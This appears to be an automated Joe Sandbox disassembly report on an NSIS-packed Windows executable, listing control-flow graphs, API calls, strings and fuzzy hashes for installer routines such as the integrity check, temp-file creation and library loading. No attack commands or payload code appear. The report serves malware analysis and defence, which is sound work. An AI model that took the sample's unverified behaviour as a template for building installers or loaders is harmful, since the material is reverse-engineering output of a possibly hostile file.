                                                                                        control_flow_graph 364 402dc4-402e12 GetTickCount GetModuleFileNameA call 405b73 367 402e14-402e19 364->367 368 402e1e-402e4c call 405fda call 4059b9 call 405fda GetFileSize 364->368 370 402ff4-402ff8 367->370 376 402e52 368->376 377 402f37-402f45 call 402d60 368->377 379 402e57-402e6e 376->379 383 402f47-402f4a 377->383 384 402f9a-402f9f 377->384 381 402e70 379->381 382 402e72-402e7b call 4031d7 379->382 381->382 390 402fa1-402fa9 call 402d60 382->390 391 402e81-402e88 382->391 386 402f4c-402f64 call 4031ed call 4031d7 383->386 387 402f6e-402f98 GlobalAlloc call 4031ed call 402ffb 383->387 384->370 386->384 413 402f66-402f6c 386->413 387->384 411 402fab-402fbc 387->411 390->384 395 402f04-402f08 391->395 396 402e8a-402e9e call 405b2e 391->396 401 402f12-402f18 395->401 402 402f0a-402f11 call 402d60 395->402 396->401 410 402ea0-402ea7 396->410 407 402f27-402f2f 401->407 408 402f1a-402f24 call 406429 401->408 402->401 407->379 412 402f35 407->412 408->407 410->401 417 402ea9-402eb0 410->417 418 402fc4-402fc9 411->418 419 402fbe 411->419 412->377 413->384 413->387 417->401 420 402eb2-402eb9 417->420 421 402fca-402fd0 418->421 419->418 420->401 422 402ebb-402ec2 420->422 421->421 423 402fd2-402fed SetFilePointer call 405b2e 421->423 422->401 424 402ec4-402ee4 422->424 427 402ff2 423->427 424->384 426 402eea-402eee 424->426 428 402ef0-402ef4 426->428 429 402ef6-402efe 426->429 427->370 428->412 428->429 429->401 430 402f00-402f02 429->430 430->401
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00402DD5
                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\jU0hAXFL0k.exe,00000400), ref: 00402DF1
                                                                                          • Part of subcall function 00405B73: GetFileAttributesA.KERNELBASE(00000003,00402E04,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00405B77
                                                                                          • Part of subcall function 00405B73: CreateFileA.KERNELBASE(?,?,?,00000000,?,00000001,00000000), ref: 00405B99
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\jU0hAXFL0k.exe,C:\Users\user\Desktop\jU0hAXFL0k.exe,80000000,00000003), ref: 00402E3D
                                                                                        • GlobalAlloc.KERNELBASE(?,00000020), ref: 00402F73
                                                                                        Strings
                                                                                        • Null, xrefs: 00402EBB
                                                                                        • Error launching installer, xrefs: 00402E14
                                                                                        • soft, xrefs: 00402EB2
                                                                                        • C:\Users\user\Desktop, xrefs: 00402E1F, 00402E24, 00402E2A
                                                                                        • C:\Users\user\Desktop\jU0hAXFL0k.exe, xrefs: 00402DDB, 00402DEA, 00402DFE, 00402E1E
                                                                                        • Inst, xrefs: 00402EA9
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00402DC4
                                                                                        • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error, xrefs: 00402F9A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00402DCB
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\jU0hAXFL0k.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                                                        • API String ID: 2803837635-2486869544
                                                                                        • Opcode ID: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                        • Instruction ID: 90621c4e807be281ea96420bab05d42ad29c2ea1f6fd119d4e9c070f99f8684f
                                                                                        • Opcode Fuzzy Hash: e3dcd2eca1662e46ac7c1f33add0d366139843b85baf5fae3e102a31fecf404d
                                                                                        • Instruction Fuzzy Hash: 1A51F771A00216ABDF209F61DE89B9E7BB8EB54355F50403BF900B72C1C6BC9E4197AD
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405FFC Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 199stringCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 431 405ffc-406007 432 406009-406018 431->432 433 40601a-406030 431->433 432->433 434 406221-406225 433->434 435 406036-406041 433->435 436 406053-40605d 434->436 437 40622b-406235 434->437 435->434 438 406047-40604e 435->438 436->437 441 406063-40606a 436->441 439 406240-406241 437->439 440 406237-40623b call 405fda 437->440 438->434 440->439 442 406070-4060a4 441->442 443 406214 441->443 445 4061c1-4061c4 442->445 446 4060aa-4060b4 442->446 447 406216-40621c 443->447 448 40621e-406220 443->448 451 4061f4-4061f7 445->451 452 4061c6-4061c9 445->452 449 4060b6-4060ba 446->449 450 4060ce 446->450 447->434 448->434 449->450 453 4060bc-4060c0 449->453 456 4060d5-4060dc 450->456 457 406205-406212 lstrlenA 451->457 458 4061f9-406200 call 405ffc 451->458 454 4061d9-4061e5 call 405fda 452->454 455 4061cb-4061d7 call 405f38 452->455 453->450 459 4060c2-4060c6 453->459 469 4061ea-4061f0 454->469 455->469 461 4060e1-4060e3 456->461 462 4060de-4060e0 456->462 457->434 458->457 459->450 465 4060c8-4060cc 459->465 467 4060e5-406100 call 405ec1 461->467 468 40611c-40611f 461->468 462->461 465->456 477 406105-406108 467->477 470 406121-40612d GetSystemDirectoryA 468->470 471 40612f-406132 468->471 469->457 473 4061f2 469->473 474 4061a3-4061a6 470->474 475 406134-406142 GetWindowsDirectoryA 471->475 476 40619f-4061a1 471->476 478 4061b9-4061bf call 406244 473->478 474->478 481 4061a8-4061ac 474->481 475->476 476->474 480 406144-40614e 476->480 477->481 482 40610e-406117 call 405ffc 477->482 478->457 484 406150-406153 480->484 485 406168-40617e SHGetSpecialFolderLocation 480->485 481->478 487 4061ae-4061b4 lstrcatA 481->487 482->474 484->485 488 406155-40615c 484->488 489 406180-40619a SHGetPathFromIDListA CoTaskMemFree 485->489 490 40619c 485->490 487->478 492 406164-406166 488->492 489->474 489->490 490->476 492->474 492->485
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 00406127
                                                                                        • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000), ref: 0040613A
                                                                                        • SHGetSpecialFolderLocation.SHELL32(00405139,00000000,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000), ref: 00406176
                                                                                        • SHGetPathFromIDListA.SHELL32(00000000,Call), ref: 00406184
                                                                                        • CoTaskMemFree.OLE32(00000000), ref: 00406190
                                                                                        • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 004061B4
                                                                                        • lstrlenA.KERNEL32(Call,?,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00405139,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,00000000,004168C0,00000000), ref: 00406206
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                        • String ID: Call$Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                        • API String ID: 717251189-1188836177
                                                                                        • Opcode ID: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                        • Instruction ID: f6f0e3a74e6b455581cb0d86726a6c3d239f08f65b325d122068a3aaf356d786
                                                                                        • Opcode Fuzzy Hash: f9d0b1cf2701d91d5acd79df49d905e61aa9589697f689ea0562d06cd488d680
                                                                                        • Instruction Fuzzy Hash: F4610571A00115ABEF20AF64DC84B7A3BA4DB55314F12417FEA03BA2D2C23C4962DB5E
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405101 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 73stringwindowCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 629 405101-405116 630 4051cc-4051d0 629->630 631 40511c-40512e 629->631 632 405130-405134 call 405ffc 631->632 633 405139-405145 lstrlenA 631->633 632->633 634 405162-405166 633->634 635 405147-405157 lstrlenA 633->635 638 405175-405179 634->638 639 405168-40516f SetWindowTextA 634->639 635->630 637 405159-40515d lstrcatA 635->637 637->634 640 40517b-4051bd SendMessageA * 3 638->640 641 4051bf-4051c1 638->641 639->638 640->641 641->630 642 4051c3-4051c6 641->642 642->630
                                                                                        APIs
                                                                                        • lstrlenA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000,?), ref: 0040513A
                                                                                        • lstrlenA.KERNEL32(0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000,?,?,?,?,?,?,?,?,?,0040312B,00000000), ref: 0040514A
                                                                                        • lstrcatA.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,0040312B,0040312B,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,00000000,004168C0,00000000), ref: 0040515D
                                                                                        • SetWindowTextA.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll), ref: 0040516F
                                                                                        • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405195
                                                                                        • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004051AF
                                                                                        • SendMessageA.USER32(?,00001013,?,00000000), ref: 004051BD
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$lstrlen$TextWindowlstrcat
                                                                                        • String ID: Skipped: C:\Users\user\AppData\Local\Temp\nsz7A32.tmp\System.dll
                                                                                        • API String ID: 2531174081-3974561410
                                                                                        • Opcode ID: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                        • Instruction ID: da75402713979d4bf34db42cde910fb2485d85a1008762fbb7bcbbad6d42931f
                                                                                        • Opcode Fuzzy Hash: 624fe4a610ab20420a1f4b6733ac8ea3133b8c284db2b2603e432234c565fffb
                                                                                        • Instruction Fuzzy Hash: BB219A71E00108BADF119FA4CD84ADFBFB9EF05354F04807AF404A6291C6798E419FA8
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 004055C7 Relevance: 14.0, APIs: 4, Strings: 4, Instructions: 39COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 643 4055c7-405612 CreateDirectoryA 644 405614-405616 643->644 645 405618-405625 GetLastError 643->645 646 40563f-405641 644->646 645->646 647 405627-40563b SetFileSecurityA 645->647 647->644 648 40563d GetLastError 647->648 648->646
                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040560A
                                                                                        • GetLastError.KERNEL32 ref: 0040561E
                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 00405633
                                                                                        • GetLastError.KERNEL32 ref: 0040563D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$ls@$|s@
                                                                                        • API String ID: 3449924974-2362640610
                                                                                        • Opcode ID: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                        • Instruction ID: d76da5e920ef4cf84c76b5f8b6eadacb43d526ba9f765b2b55af8eda6d007f2e
                                                                                        • Opcode Fuzzy Hash: 6494dcf4892d125dd91232f43a5d02422eac6eb6da40cea13db3a7c62baa9568
                                                                                        • Instruction Fuzzy Hash: 90010871C04219EAEF019BA1CC447EFBBB8EB14355F00853AD905B6290E779A605CFAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00406304 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 36libraryCOMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 649 406304-406324 GetSystemDirectoryA 650 406326 649->650 651 406328-40632a 649->651 650->651 652 40633a-40633c 651->652 653 40632c-406334 651->653 655 40633d-40636f wsprintfA LoadLibraryExA 652->655 653->652 654 406336-406338 653->654 654->655
                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0040631B
                                                                                        • wsprintfA.USER32 ref: 00406354
                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,?), ref: 00406368
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-4240819195
                                                                                        • Opcode ID: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                        • Instruction ID: 15cbb93803340843acffe9ced60e7e2f3372dd006ff9664fb566d465880257e2
                                                                                        • Opcode Fuzzy Hash: c1c6f81e5f0925475fc46656834228b64d6aad10adaabf52e6c46f27d1be3297
                                                                                        • Instruction Fuzzy Hash: C8F09C30900116ABDB159768DD0DFFB365CEB08309F14057AB986E11D1D574E9258B99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00402FFB Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 155COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 656 402ffb-40300f 657 403011 656->657 658 403018-403020 656->658 657->658 659 403022 658->659 660 403027-40302c 658->660 659->660 661 40303c-403049 call 4031d7 660->661 662 40302e-403037 call 4031ed 660->662 666 40318e 661->666 667 40304f-403053 661->667 662->661 670 403190-403191 666->670 668 403177-403179 667->668 669 403059-403079 GetTickCount call 406497 667->669 671 4031c2-4031c6 668->671 672 40317b-40317e 668->672 680 4031cd 669->680 682 40307f-403087 669->682 674 4031d0-4031d4 670->674 675 403193-403199 671->675 676 4031c8 671->676 677 403180 672->677 678 403183-40318c call 4031d7 672->678 683 40319b 675->683 684 40319e-4031ac call 4031d7 675->684 676->680 677->678 678->666 689 4031ca 678->689 680->674 686 403089 682->686 687 40308c-40309a call 4031d7 682->687 683->684 684->666 692 4031ae-4031ba call 405c1a 684->692 686->687 687->666 695 4030a0-4030a9 687->695 689->680 698 403173-403175 692->698 699 4031bc-4031bf 692->699 697 4030af-4030cc call 4064b7 695->697 702 4030d2-4030e9 GetTickCount 697->702 703 40316f-403171 697->703 698->670 699->671 704 4030eb-4030f3 702->704 705 40312e-403130 702->705 703->670 706 4030f5-4030f9 704->706 707 4030fb-403126 MulDiv wsprintfA call 405101 704->707 708 403132-403136 705->708 709 403163-403167 705->709 706->705 706->707 714 40312b 707->714 712 403138-40313d call 405c1a 708->712 713 40314b-403151 708->713 709->682 710 40316d 709->710 710->680 717 403142-403144 712->717 716 403157-40315b 713->716 714->705 716->697 718 403161 716->718 717->698 719 403146-403149 717->719 718->680 719->716
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountTick$wsprintf
                                                                                        • String ID: ... %d%%
                                                                                        • API String ID: 551687249-2449383134
                                                                                        • Opcode ID: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                        • Instruction ID: eed10709806649b2ce9ecdbe6bed08e8f554dc741dea3641cf9b2fc180d08aa2
                                                                                        • Opcode Fuzzy Hash: 28484a559e18d06ed43ef22bfdd21feadbb4bbad1a21b96adf7a711402a84214
                                                                                        • Instruction Fuzzy Hash: A7515E71901219ABDB10EF65D904A9F3BB8AF48756F14413BFD10BB2C0C7789E51CBAA
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 00405BA2 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 720 405ba2-405bac 721 405bad-405bd8 GetTickCount GetTempFileNameA 720->721 722 405be7-405be9 721->722 723 405bda-405bdc 721->723 725 405be1-405be4 722->725 723->721 724 405bde 723->724 724->725
                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405BB6
                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000006,?,0000000A), ref: 00405BD0
                                                                                        Strings
                                                                                        • "C:\Users\user\Desktop\jU0hAXFL0k.exe", xrefs: 00405BA2
                                                                                        • nsa, xrefs: 00405BAD
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405BA5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000005.00000002.2064061957628.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000005.00000002.2064061908771.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064061994649.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000428000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062043991.0000000000438000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000005.00000002.2064062298643.000000000043A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_5_2_400000_jU0hAXFL0k.jbxd
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\jU0hAXFL0k.exe"$C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-2280932713
                                                                                        • Opcode ID: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                        • Instruction ID: 2f7af396f84d097035df83fe1d719984909df90e6a6ed76a9758152acb097983
                                                                                        • Opcode Fuzzy Hash: 4f71c4811bd2189c67125445424a5cfd250d6f6759894b34be1bee502b12972b
                                                                                        • Instruction Fuzzy Hash: B9F082367082086BEB108F5ADC04B9B7BA8DF91750F14803BFA08DA291D6B4B9548B69
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Function 6FE916DB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 120COMMON
                                                                                        Download Yara Rule

                                                                                        Control-flow Graph

                                                                                        • Executed
                                                                                        • Not Executed
                                                                                        control_flow_graph 726 6fe916db-6fe91717 call 6fe91a98 730 6fe9171d-6fe91721 726->730 731 6fe91834-6fe91836 726->731 732 6fe9172a-6fe91737 call 6fe922f1 730->732 733 6fe91723-6fe91729 call 6fe922af 730->733 738 6fe91739-6fe9173e 732->738 739 6fe91767-6fe9176e 732->739 733->732 742 6fe91759-6fe9175c 738->742 743 6fe91740-6fe91741 738->743 740 6fe9178e-6fe91792 739->740 741 6fe91770-6fe9178c call 6fe924d8 call 6fe91559 call 6fe91266 GlobalFree 739->741 744 6fe917dc-6fe917e2 call 6fe924d8 740->744 745 6fe91794-6fe917da call 6fe9156b call 6fe924d8 740->745 767 6fe917e3-6fe917e7 741->767 742->739 746 6fe9175e-6fe9175f call 6fe92cc3 742->746 748 6fe91749-6fe9174a call 6fe92a38 743->748 749 6fe91743-6fe91744 743->749 744->767 745->767 761 6fe91764 746->761 758 6fe9174f 748->758 750 6fe91751-6fe91757 call 6fe926b2 749->750 751 6fe91746-6fe91747 749->751 766 6fe91766 750->766 751->739 751->748 758->761 761->766 766->739 770 6fe917e9-6fe917f7 call 6fe9249e 767->770 771 6fe91824-6fe9182b 767->771 776 6fe917f9-6fe917fc 770->776 777 6fe9180f-6fe91816 770->777 771->731 773 6fe9182d-6fe9182e GlobalFree 771->773 773->731 776->777 778 6fe917fe-6fe91806 776->778 777->771 779 6fe91818-6fe91823 call 6fe914e2 777->779 778->777 780 6fe91808-6fe91809 FreeLibrary 778->780 779->771 780->777
                                                                                        APIs
                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D09
                                                                                          • Part of subcall function 6FE91A98: GlobalFree.KERNEL32(?), ref: 6FE91D0E
